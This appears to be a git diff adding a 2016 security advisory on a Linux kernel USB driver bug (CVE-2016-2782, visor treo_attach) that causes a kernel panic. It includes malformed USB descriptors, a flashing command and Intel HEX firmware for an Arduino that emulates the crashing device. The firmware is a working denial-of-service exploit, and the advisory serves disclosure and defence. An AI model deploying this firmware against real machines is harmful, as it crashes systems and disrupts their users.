+:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 
+:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B +:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 
+:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 +:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE 
+:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 +:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 
+:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 +:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C 
+:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:10142000000000406A05900000010102030109026A +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE +:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 
+:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 +:1017D0002009203E3E20537472696E672044657371 +:1017E00063726970746F72207265717565737420AD +:1017F0002D2073656E64696E67206D616C666F7213 +:101800006D656420737472696E67212073657475E9 +:10181000702E7756616C75654C203D3D2025690D15 +:101820000A005B48455844554D505D0A0D0025306F +:04183000325820000A +:00000001FF 
diff --git a/platforms/linux/dos/39539.txt b/platforms/linux/dos/39539.txt
new file mode 100755
index 000000000..e1e7e8b63
--- /dev/null
+++ b/platforms/linux/dos/39539.txt
@@ -0,0 +1,618 @@
+OS-S Security Advisory 2016-10
+Linux visor (treo_attach) Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: CVE-2016-2782
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (visor treo_attach driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
+device requiring the visor (treo_attach) driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x82d
+idProduct: 0x200
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+The treo_attach function does not use the num_ports (struct usb_serial) value
+for any kind of sanity checks during the initialization process.
Due to an +incomplete sanity check, the driver could try to dereference a null-pointer if +a malformed device-descriptor is presented (zero-value for bNumEndpoints or no +required endpoint-descriptors is provided). +This results in a crash of the system. + +**** +... +554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \ /* Possible +Nullpointer-Dereference */ +560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0); +573 +574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL); +575 if (!swap_port) +576 return -ENOMEM; +577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */ +578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */ +579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */ +... 
+****
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x3
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81
+bmAttribut: 0x3
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82
+bmAttribut: 0x1
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+This bug was fixed upstream. A CVE number was not assigned.
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283374
+http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i
+d=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0
+
+Kernel Stacktrace:
+
+[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200
+[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 35.417186] usb 1-1: Product: Ä? 
+[ 35.421846] usb 1-1: Manufacturer: Ä? +[ 35.425686] usb 1-1: SerialNumber: % +[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc +says 96 microframes +[ 35.493316] usbcore: registered new interface driver visor +[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / +Palm OS +[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0 +[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5 +[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected +[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at +00000000000000b0 +[ 35.543244] IP: [] treo_attach+0x61/0x340 [visor] +[ 35.543244] PGD 0 +[ 35.543244] Oops: 0002 [#1] SMP +[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT +xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables +ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle +ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat +nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack +iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm +ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 +i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif +cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy +dm_mirror dm_region_hash dm_log dm_mod +[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 35.543244] RIP: 0010:[] [] +treo_attach+0x61/0x340 [visor] +[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286 +[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2 +[ 35.543244] RDX: 
0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400 +[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400 +[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404 +[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400 +[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: +00000000000006f0 +[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 35.543244] Stack: +[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007 +[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400 +[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 +ffff88000bcd0090 +[ 35.543244] Call Trace: +[ 35.543244] [] usb_serial_probe+0xdb1/0x1230 +[ 35.543244] [] ? ida_get_new_above+0x7c/0x2a0 +[ 35.543244] [] ? kmem_cache_alloc+0x1ba/0x1d0 +[ 35.543244] [] ? sysfs_addrm_finish+0x42/0xe0 +[ 35.543244] [] ? __sysfs_add_one+0x61/0x100 +[ 35.543244] [] usb_probe_interface+0x1c4/0x2f0 +[ 35.543244] [] driver_probe_device+0x87/0x390 +[ 35.543244] [] __driver_attach+0x93/0xa0 +[ 35.543244] [] ? __device_attach+0x40/0x40 +[ 35.543244] [] bus_for_each_dev+0x73/0xc0 +[ 35.543244] [] driver_attach+0x1e/0x20 +[ 35.543244] [] usb_serial_register_drivers+0x29b/0x580 +[ 35.543244] [] ? 0xffffffffa0397fff +[ 35.543244] [] usb_serial_module_init+0x1e/0x1000 [visor] +[ 35.543244] [] do_one_initcall+0xb8/0x230 +[ 35.543244] [] load_module+0x133e/0x1b40 +[ 35.543244] [] ? ddebug_proc_write+0xf0/0xf0 +[ 35.543244] [] ? 
copy_module_from_fd.isra.42+0x53/0x150 +[ 35.543244] [] SyS_finit_module+0xa6/0xd0 +[ 35.543244] [] system_call_fastpath+0x16/0x1b +[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 +0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> +89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 +[ 35.543244] RIP [] treo_attach+0x61/0x340 [visor] +[ 35.543244] RSP +[ 35.543244] CR2: 00000000000000b0 +[ 35.973188] ---[ end trace b239663354a1c556 ]--- +[ 35.978862] Kernel panic - not syncing: Fatal exception +[ 35.979835] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F 
+:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 
+:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 